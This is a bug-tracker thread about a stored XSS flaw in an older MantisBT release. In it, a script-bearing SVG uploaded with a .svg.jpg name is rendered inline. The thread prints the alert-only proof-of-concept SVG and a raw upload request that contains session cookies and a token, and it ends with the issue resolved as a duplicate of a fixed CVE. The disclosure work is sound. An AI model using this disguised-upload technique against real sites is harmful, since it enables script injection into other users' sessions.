Thanks for the detailed bug report. I'll have a closer look as soon as possible.

Hello,

I tried to reproduce this using the provided instructions, but while I'm able to upload the fake JPG SVG file, and while I can see in the bug_file table that it has a mime type of image/svg+xml, I was not able to have the script executed, despite having disabled CSP. No output in the browser's console either.

Am I missing something ?

image.png (51,806 bytes)   

image.png (51,806 bytes)   

image-2.png (19,455 bytes)   

image-2.png (19,455 bytes)   

Hi, thanks for trying to reproduce this issue.

Is the file being downloaded or is it rendered in the web browser?

I have included another SVG to try. You can put this into a svg file and execute it into your web browser to see if your web browser is blocking the script. I used the Firefox web browser to check this.

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert('This app is probably vulnerable to XSS attacks!');
   </script>
</svg>

Thanks for the new SVG, but I don't think the problem is with the image file itself, but I rather me misunderstanding the reproducing steps...

• If I open the file in the browser directly, I do get the pop-up alert and then see the green triangle (tested with Safari & Chrome on macOS - I can try tomorrow at work on Windows/Firefox)
• Uploading xss.svg fails
• Uploading xss.svg.jpg is successful, and as mentioned before it is stored in the DB with mime type image/svg+xml (which I guess is the root cause of the problem you reported)
• Displaying the issue is rendering the image inline (see screenshot), but the script is not executed and there is nothing in the browser's console

image-3.png (37,236 bytes)   

image-3.png (37,236 bytes)   

Hi, I have disabled CSP on the system and tested again with the following request:

POST /mantis-dev/bugnote_add.php HTTP/1.1
Host: grotaap10253.ota.duo.nl
Cookie: PHPSESSID=a0urofhh9t8q5katqt8j9f5fbb; MANTIS_secure_session=1; MANTIS_STRING_COOKIE=L6K-KLKAcg0F8DlCNV5L3NoilLZ_9o0fHtePzSnESEb4R2yTwN-BxmjD1qhyUCSW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------297316024025962881292697814702
Content-Length: 1180
Origin: https://grotaap10253.ota.duo.nl
Referer: https://grotaap10253.ota.duo.nl/mantis-dev/view.php?id=13409
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive

-----------------------------297316024025962881292697814702
Content-Disposition: form-data; name="bugnote_add_token"

20250311vgz7luQB18pcKDcd00LgvAHxVgR5EdfX
-----------------------------297316024025962881292697814702
Content-Disposition: form-data; name="bug_id"

13409
-----------------------------297316024025962881292697814702
Content-Disposition: form-data; name="bugnote_text"

-----------------------------297316024025962881292697814702
Content-Disposition: form-data; name="max_file_size"

2000000
-----------------------------297316024025962881292697814702
Content-Disposition: form-data; name="ufile[0]"; filename="ajhkergjerk.svg.jpg"
Content-Type: image/jpeg

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert('This app is probably vulnerable to XSS attacks!');
   </script>
</svg>
-----------------------------297316024025962881292697814702--

I noticed that Content-Type: image/jpeg also works, if the file is clicked it opens inline as described in the following parameter:

$t_mime_force_inline = array(
    'application/pdf',
    'image/bmp',
    'image/gif',
    'image/jpeg',
    'image/png',
    'image/tiff',
);

On my older mantis version it still includes the 'image/svg+xml' content type inline.

If the file doesn't display inline when clicked, the inline config is probably different, or already fixed in a different manner.

xss-execution.png (22,358 bytes)   

xss-execution.png (22,358 bytes)   

On my older mantis version it still includes the 'image/svg+xml' content type inline.

Ah, maybe that's it - I only now realize that you were on 2.25.2... There's quite a few known vulnerabilities in this 4-year-old release which have been fixed in newer versions (check out the change log for details). Any particular reason for not upgrading ?

Did you look at 0029135 and 0030384 (CVE-2022-33910) ? It sounds like your problem is the same... If so please note that the issue was fixed in 2.25.5.

I strongly recommend that you upgrade to 2.27.1.

We're planning on upgrading, but it will take some time, as we have added many custom modifications.

Thanks for linking me 0029135 and 0030384, I haven't seen those before.

I installed a brand new system with a newer version of Mantis on it, and can confirm it doesn't work in the newer version.

This bug can be closed, thanks again.

Thanks for the feedback. As discussed I'm resolving this as duplicate of 0029135.